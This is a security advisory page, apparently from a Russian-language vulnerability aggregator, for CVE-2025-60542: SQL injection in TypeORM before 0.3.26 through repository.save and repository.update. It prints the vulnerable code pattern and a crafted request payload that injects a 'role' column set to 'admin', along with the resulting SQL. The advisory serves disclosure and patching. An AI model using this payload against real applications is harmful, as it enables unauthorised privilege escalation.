Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-q2pj-6v73-8rgj

Опубликовано: 29 окт. 2025
Источник: github
Github: Прошло ревью
CVSS4: 8.9
CVSS3: 6.5

Описание

TypeORM vulnerable to SQL injection via crafted request to repository.save or repository.update

Summary

SQL Injection vulnerability in TypeORM before 0.3.26 via crafted request to repository.save or repository.update due to the sqlstring call using stringifyObjects default to false.

Details

Vulnerable Code:

const { username, city, name} = req.body; const updateData = { username, city, name, id:userId }; // Developer aims to only allow above three fields to be updated const result = await userRepo.save(updateData);

Intended Payload (non-malicious):

username=myusername&city=Riga&name=Javad

OR

{username:\"myusername\",phone:12345,name:\"Javad\"}

SQL query produced:

UPDATE `user` SET `username` = 'myusername', `city` = 'Riga', `name` = 'Javad' WHERE `id` IN (1);

Malicious Payload:

username=myusername&city[name]=Riga&city[role]=admin

OR

{username:\"myusername\",city:{name:\"Javad\",role:\"admin\"}}

SQL query produced with Injected Column:

UPDATE `user` SET `username` = 'myusername', `city` = `name` = 'Javad', `role` = 'admin' WHERE `id` IN (1);

Above query is valid as city = name = Javad is a boolean expression resulting in city = 1 (false). “role” column is injected and updated.

Underlying issue was due to TypeORM using mysql2 without specifying a value for the stringifyObjects option. In both mysql and mysql2 this option defaults to false. This option is then passed into SQLString library as false. This results in sqlstring parsing objects in a strange way using objectToValues.

Ссылки

Пакеты

Наименование

typeorm

npm
Затронутые версииВерсия исправления

< 0.3.26

0.3.26

EPSS

Процентиль: 14%
0.00047
Низкий

8.9 High

CVSS4

6.5 Medium

CVSS3

CVE ID

CVE-2025-60542

Дефекты

CWE-89

Связанные уязвимости

nvd логотип

CVE-2025-60542

CVSS3: 6.5
nvd
3 месяца назад

SQL Injection vulnerability in TypeORM before 0.3.26 via crafted request to repository.save or repository.update due to the sqlstring call using stringifyObjects default to false.

EPSS

Процентиль: 14%
0.00047
Низкий

8.9 High

CVSS4

6.5 Medium

CVSS3

CVE ID

CVE-2025-60542

Дефекты

CWE-89